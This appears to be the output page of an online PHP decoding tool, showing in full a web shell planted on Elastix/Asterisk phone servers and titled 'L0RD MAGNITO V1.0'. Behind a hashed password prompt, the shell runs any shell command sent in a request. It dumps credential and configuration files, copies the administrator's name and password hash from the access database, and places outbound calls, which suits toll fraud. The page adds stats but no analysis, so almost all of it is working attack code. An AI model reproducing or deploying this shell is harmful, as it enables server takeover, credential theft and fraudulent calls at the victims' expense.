Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /*E5R7WLYS6D*/ session_name("elastixSession"); session_start(); if ((isset($_REQU..
Decoded Output download
<?php /*E5R7WLYS6D*/
session_name("elastixSession");
session_start();
if ((isset($_REQUEST['md5']) && md5($_REQUEST['md5']) != 'a4db9c8f1f48397686fe659bc7bacc55') || !isset($_REQUEST['md5']) && !isset($_SESSION['uid'])) {
echo '<form action="" method="post">';
echo '<input type="text" placehoder="./hackz" name="md5" />';
echo '<input type="submit" value="./login" />';
echo '</form>';
echo '<? -- ((/*189.211.179.90*/)) -- ?>';
exit();
}
$_SESSION['uid'] = 1;
if ($_SESSION['uid']) {
if ($_REQUEST['web'] == 'no') {
system($_REQUEST['cmd']);
} else {
include_once "/var/www/html/libs/paloSantoDB.class.php";
include_once "/var/www/html/libs/paloSantoACL.class.php";
$pDB = new paloDB("sqlite3:////var/www/db/acl.db");
$db = $pDB->fetchTable("SELECT name, md5_password,extension from acl_user WHERE id ='1'");
$_SESSION['elastix_user'] = $db[0][0];
$_SESSION['elastix_pass'] = $db[0][1];
echo '<h1 style="text-align: center; color-red">L0RD MAGNITO V1.0</h1>';
echo '<style>input,select{height: 30px; padding: 5px; font-weight: bolder;}</style>';
echo '<form action="" method="post">';
echo '<input type="text" name="context" value="asterisk-outcalls" />';
echo '<input type="text" name="time" value="60" />';
echo '<input type="text" name="prs" value="00" />';
echo '<input type="text" name="num" placeholder="number" />';
echo '<input type="submit" name="submit" value="call" />';
echo '</form><br />';
echo '<form action="" method="post">';
echo '<select name="cmd">';
echo '<option value="cat /etc/elastix.conf">elastix.conf</option>';
echo '<option value="grep AMPDB /etc/amportal.conf">amportal.conf</option>';
echo '<option value="cat /etc/asterisk/sip_additional.conf">sip_additional.conf</option>';
echo '<option value="cat /etc/asterisk/extensions_custom.conf">extensions_custom.conf</option>';
echo '<option value="ps -aux --forest">ps -aux --forest</option>';
echo '<option value=\'asterisk -rx "core show channels"\'>active calls</option>';
echo '<input type="submit" name="submit" value="exec" />';
echo '</form>';
echo '<form action="" method="post">';
echo '<input type="text" name="cmd" />';
echo '<input type="submit" name="submit" value="run" />';
echo '</form><br />';
echo '<a href="/" >Admin GO</a>';
echo '<hr /><pre>';
switch ($_REQUEST['submit']) {
case 'call':
system('asterisk -rx "channel originate Local/' . $_REQUEST['prs'] . $_REQUEST['num'] . '@' . $_REQUEST['context'] . ' application wait ' . $_REQUEST['time'] . '"');
break;
case 'run':
case 'exec':
system($_REQUEST['cmd']);
break;
default:
system("grep AMPDB /etc/amportal.conf");
break;
}
}
}
?>/*SHMTLZVXO3CXOCR*/Did this file decode correctly?
Original Code
<?php /*E5R7WLYS6D*/
session_name("elastixSession");
session_start();
if ((isset($_REQUEST['md5']) && md5($_REQUEST['md5']) != 'a4db9c8f1f48397686fe659bc7bacc55') || !isset($_REQUEST['md5']) && !isset($_SESSION['uid'])) {
echo '<form action="" method="post">';
echo '<input type="text" placehoder="./hackz" name="md5" />';
echo '<input type="submit" value="./login" />';
echo '</form>';
echo '<? -- ((/*189.211.179.90*/)) -- ?>';
exit();
}
$_SESSION['uid'] = 1;
if ($_SESSION['uid']) {
if ($_REQUEST['web'] == 'no') {
system($_REQUEST['cmd']);
} else {
include_once "/var/www/html/libs/paloSantoDB.class.php";
include_once "/var/www/html/libs/paloSantoACL.class.php";
$pDB = new paloDB("sqlite3:////var/www/db/acl.db");
$db = $pDB->fetchTable("SELECT name, md5_password,extension from acl_user WHERE id ='1'");
$_SESSION['elastix_user'] = $db[0][0];
$_SESSION['elastix_pass'] = $db[0][1];
echo '<h1 style="text-align: center; color-red">L0RD MAGNITO V1.0</h1>';
echo '<style>input,select{height: 30px; padding: 5px; font-weight: bolder;}</style>';
echo '<form action="" method="post">';
echo '<input type="text" name="context" value="asterisk-outcalls" />';
echo '<input type="text" name="time" value="60" />';
echo '<input type="text" name="prs" value="00" />';
echo '<input type="text" name="num" placeholder="number" />';
echo '<input type="submit" name="submit" value="call" />';
echo '</form><br />';
echo '<form action="" method="post">';
echo '<select name="cmd">';
echo '<option value="cat /etc/elastix.conf">elastix.conf</option>';
echo '<option value="grep AMPDB /etc/amportal.conf">amportal.conf</option>';
echo '<option value="cat /etc/asterisk/sip_additional.conf">sip_additional.conf</option>';
echo '<option value="cat /etc/asterisk/extensions_custom.conf">extensions_custom.conf</option>';
echo '<option value="ps -aux --forest">ps -aux --forest</option>';
echo '<option value=\'asterisk -rx "core show channels"\'>active calls</option>';
echo '<input type="submit" name="submit" value="exec" />';
echo '</form>';
echo '<form action="" method="post">';
echo '<input type="text" name="cmd" />';
echo '<input type="submit" name="submit" value="run" />';
echo '</form><br />';
echo '<a href="/" >Admin GO</a>';
echo '<hr /><pre>';
switch ($_REQUEST['submit']) {
case 'call':
system('asterisk -rx "channel originate Local/' . $_REQUEST['prs'] . $_REQUEST['num'] . '@' . $_REQUEST['context'] . ' application wait ' . $_REQUEST['time'] . '"');
break;
case 'run':
case 'exec':
system($_REQUEST['cmd']);
break;
default:
system("grep AMPDB /etc/amportal.conf");
break;
}
}
}
?>/*SHMTLZVXO3CXOCR*/Function Calls
| session_name | 1 |
Stats
| MD5 | 6d235513834111bfa19190e47a3178fb |
| Eval Count | 0 |
| Decode Time | 92 ms |